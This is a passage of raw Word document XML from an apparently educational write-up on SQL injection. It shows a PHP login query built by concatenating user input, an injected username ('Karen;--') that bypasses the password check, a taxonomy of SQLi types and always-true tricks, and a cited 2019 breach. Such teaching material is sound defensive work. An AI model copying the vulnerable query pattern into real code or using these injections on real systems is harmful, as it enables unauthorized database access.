        <w:rPr>
          <w:b/>
          <w:i/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>$</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>query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.</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>=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"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password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=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'"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.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$_POST['password'</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>]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.</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/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"'";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="175749D8" w14:textId="77777777" w:rsidR="00230D57" w:rsidRDefault="00230D57" w:rsidP="00230D57">
      <w:pPr>
        <w:ind w:left="120"/>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>?&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AB8A8C8" w14:textId="77777777" w:rsidR="00230D57" w:rsidRDefault="00230D57" w:rsidP="00230D57">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="10"/>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:sz w:val="23"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="692FB4CE" w14:textId="77777777" w:rsidR="00230D57" w:rsidRDefault="00230D57" w:rsidP="00230D57">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="1"/>
        <w:ind w:left="120" w:right="120"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>For</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>instance,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Karen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'12345'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>attempts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in,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generated</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-57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 sent to the database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be:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66382CDC" w14:textId="77777777" w:rsidR="00230D57" w:rsidRDefault="00230D57" w:rsidP="00230D57">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="1"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="141DCE97" w14:textId="77777777" w:rsidR="00230D57" w:rsidRDefault="00230D57" w:rsidP="00230D57">
      <w:pPr>
        <w:ind w:left="120"/>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>SELECT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*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FROM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users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WHERE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username='Karen'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password='12345'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="568B2217" w14:textId="77777777" w:rsidR="00230D57" w:rsidRDefault="00230D57" w:rsidP="00230D57">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="11"/>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:sz w:val="23"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="32A79EC7" w14:textId="77777777" w:rsidR="00230D57" w:rsidRDefault="00230D57" w:rsidP="00230D57">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="120" w:right="116"/>
        <w:jc w:val="both"/>
      </w:pP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attacker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bypass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might</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-58"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t>input</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t>something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'</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t>Karen;--</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t>'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field.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SQL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-1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look</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-57"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>like:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63830AA3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353C00F5" w14:textId="77777777" w:rsidR="00230D57" w:rsidRDefault="00230D57" w:rsidP="00230D57">
      <w:pPr>
        <w:spacing w:before="1"/>
        <w:ind w:left="120"/>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>SELECT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*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FROM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users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WHERE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username='Karen';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--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'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:spacing w:val="-13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password='1111'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59FD8680" w14:textId="77777777" w:rsidR="00230D57" w:rsidRDefault="00230D57" w:rsidP="00230D57">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="10"/>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:sz w:val="23"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6E1DD1FC" w14:textId="77777777" w:rsidR="00230D57" w:rsidRDefault="00230D57" w:rsidP="00230D57">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="120" w:right="118"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Here, the attacker adds '--' (double-dash) to comment out the remaining SQL statement,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="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 information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bypass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screen.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="090DA98F" w14:textId="77777777" w:rsidR="00230D57" w:rsidRDefault="00230D57" w:rsidP="00230D57">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6C2E93E9" w14:textId="77777777" w:rsidR="00230D57" w:rsidRDefault="00230D57" w:rsidP="00230D57">
      <w:pPr>
        <w:ind w:left="120" w:right="121"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Attacker: Exploits features of the database server to execute commands and gather results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same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communication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channel.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51ED3DFD" w14:textId="77777777" w:rsidR="00230D57" w:rsidRDefault="00230D57" w:rsidP="00230D57">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="2"/>
        <w:rPr>
          <w:b/>
          <w:i/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="157005EE" w14:textId="77777777" w:rsidR="00230D57" w:rsidRDefault="00230D57" w:rsidP="00230D57">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pP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SQLi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05A027F9" w14:textId="77777777" w:rsidR="00230D57" w:rsidRDefault="00230D57" w:rsidP="00230D5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6"/>
        <w:ind w:hanging="361"/>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>In-band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SQLi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C2A2AE2" w14:textId="77777777" w:rsidR="00230D57" w:rsidRDefault="00230D57" w:rsidP="00230D5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b/>
          <w:i/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Blind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SQL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Injection/Inferential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SQLi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28BC1F7B" w14:textId="77777777" w:rsidR="00230D57" w:rsidRDefault="00230D57" w:rsidP="00230D57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b/>
          <w:i/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Out-of-Band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SQLi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5410836E" w14:textId="77777777" w:rsidR="00230D57" w:rsidRDefault="00230D57" w:rsidP="00230D57">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:b/>
          <w:i/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3F195AE5" w14:textId="47A139BE" w:rsidR="00230D57" w:rsidRDefault="00230D57" w:rsidP="00230D57">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="120" w:right="118"/>
        <w:jc w:val="both"/>
        <w:sectPr w:rsidR="00230D57" w:rsidSect="009B67ED">
          <w:pgSz w:w="11910" w:h="16840"/>
          <w:pgMar w:top="1360" w:right="1320" w:bottom="280" w:left="1320" w:header="720" w:footer="720" w:gutter="0"/>
          <w:cols w:space="720"/>
        </w:sectPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">In-band SQLi </w:t>
      </w:r>
      <w:r>
        <w:t>refers to a type of SQL injection where the attacker is able to gather results</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>directly through the same communication channel used to launch the attack. This is the most</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t>common</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-12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SQL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-23"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t>injection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straightforward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attackers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AC0CF51" w14:textId="77777777" w:rsidR="00230D57" w:rsidRDefault="00230D57" w:rsidP="00230D57">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="60"/>
        <w:ind w:right="119"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>to access the database server. In-band SQLi can be further categorized into Error-based SQLi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Union-based SQLi.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61DE453E" w14:textId="77777777" w:rsidR="00230D57" w:rsidRDefault="00230D57" w:rsidP="00230D57">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="27134E2A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8"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Error-based SQL Injection: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>In this type of SQL injection, the attacker intentionally</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="1"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>triggers errors in the database by injecting malicious SQL code. The goal is to exploit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15"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>messages</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-14"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>generated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database</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-15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gain</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-1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3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and content of the database. By causing errors, the attacker can extract details that aid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attacks or unauthorized access.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AAA77A7" w14:textId="77777777" w:rsidR="00230D57" w:rsidRDefault="00230D57" w:rsidP="00230D57">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="11"/>
        <w:rPr>
          <w:sz w:val="23"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="68BD05B3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6"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Union-based SQLi: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 uses the `UNION` SQL operator to combine the result sets of</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="1"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>two or more SELECT statements. The attacker leverages the UNION operator to</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="1"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>retrieve data from other tables and concatenate it with the original query's results. This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 is often used to extract information from the database and gather details not</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="1"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>directly accessible through the original query. The combined result is then returned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the normal HTTP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-10"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>response.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3690A188" w14:textId="77777777" w:rsidR="00230D57" w:rsidRDefault="00230D57" w:rsidP="00230D57">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6591C1C2" w14:textId="77777777" w:rsidR="00230D57" w:rsidRDefault="00230D57" w:rsidP="00230D57">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="120" w:right="115"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Blind SQL Injection/Inferential SQLi </w:t>
      </w:r>
      <w:r>
        <w:t>occurs when attackers cannot directly retrieve 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infer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structure by sending malicious payloads and analyzing the application's response. Blind SQLi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categorized into</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>Content-based SQLi and</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>Time-based SQLi.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23C32A23" w14:textId="77777777" w:rsidR="00230D57" w:rsidRDefault="00230D57" w:rsidP="00230D57">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="11"/>
        <w:rPr>
          <w:sz w:val="23"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="11344175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20"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Content-based SQLi: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Forces the web application to return different results based on</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="1"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>whether the injected SQL query returns TRUE or FALSE. Analyzing the variations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attackers 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1"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>result.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CBFD696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0697EAFF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7"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Time-based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SQLi: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Sends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forces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delay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specific duration. The attacker uses the response time to determine whether the query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TRUE or</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-1"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>FALSE.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D1EFC73" w14:textId="77777777" w:rsidR="00230D57" w:rsidRDefault="00230D57" w:rsidP="00230D57">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="78C78A03" w14:textId="77777777" w:rsidR="00230D57" w:rsidRDefault="00230D57" w:rsidP="00230D57">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="120" w:right="117"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Out-of-Band</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>SQLi:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/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occurs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attacker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channel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both</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-58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results.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In-band</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>SQLi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relies</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-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server.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>Out-of-Band</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-11"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>SQLi</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-9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injection</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-58"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>attacks,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>particularly when server responses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unstable.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A0684D0" w14:textId="77777777" w:rsidR="00230D57" w:rsidRDefault="00230D57" w:rsidP="00230D57">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="1"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0721CC73" w14:textId="77777777" w:rsidR="00230D57" w:rsidRDefault="00230D57" w:rsidP="00230D57">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t>How</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t>Attackers</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="2"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>Perform SQLi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36AD03B0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spacing w:before="186"/>
        <w:ind w:right="116"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Web-page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SQLi: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Attackers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input,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="1"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>unknowingly</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="1"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>executed on the database. Exploits vulnerabilities in web applications lacking proper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validation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26733B59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2DB898F4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4"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">SQLi based on 1=1 is Always True: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Attacker inputs statements with ‘OR’ condition</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="1"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>to access all records in a table. Exploits the always true condition to gain unauthorized</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-57"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>access.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DD09765" w14:textId="77777777" w:rsidR="00230D57" w:rsidRDefault="00230D57" w:rsidP="00230D57">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="11"/>
        <w:rPr>
          <w:sz w:val="23"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="664CAD7E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7"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">SQLi based on "=" is Always True: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Uses OR statements like “or” “=” to retrieve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Manipulates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condition.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26A8B6A2" w14:textId="77777777" w:rsidR="00230D57" w:rsidRDefault="00230D57" w:rsidP="00230D57">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="1"/>
        <w:rPr>
          <w:sz w:val="30"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="317321FF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right="121"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">SQLi based on Batched Statements: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Exploits modern database servers accepting</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="1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statements.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-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targeted attacks</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-1"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>on specific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tables.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28EBEF82" w14:textId="77777777" w:rsidR="00230D57" w:rsidRDefault="00230D57" w:rsidP="00230D57">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:sectPr w:rsidR="00230D57" w:rsidSect="009B67ED">
          <w:pgSz w:w="11910" w:h="16840"/>
          <w:pgMar w:top="1360" w:right="1320" w:bottom="280" w:left="1320" w:header="720" w:footer="720" w:gutter="0"/>
          <w:cols w:space="720"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7E5006B8" w14:textId="77777777" w:rsidR="00230D57" w:rsidRDefault="00230D57" w:rsidP="00230D57">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="61"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Commonly Known</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t>SQLi</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t>Attack Examples</w:t>
      </w:r>
      <w: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Techniques</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F1EBF65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spacing w:before="184"/>
        <w:ind w:right="119"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">The 2019 Bulgarian National Revenue Agency Data Breach: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Anonymous hacker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 deployed SQL injection on the national tax authority’s servers. Extracted</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="1"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>sensitive data of over 6 million people, including social security payments, taxes, and</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="1"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>more.</w:t>
      </w:r>
    </w:p>
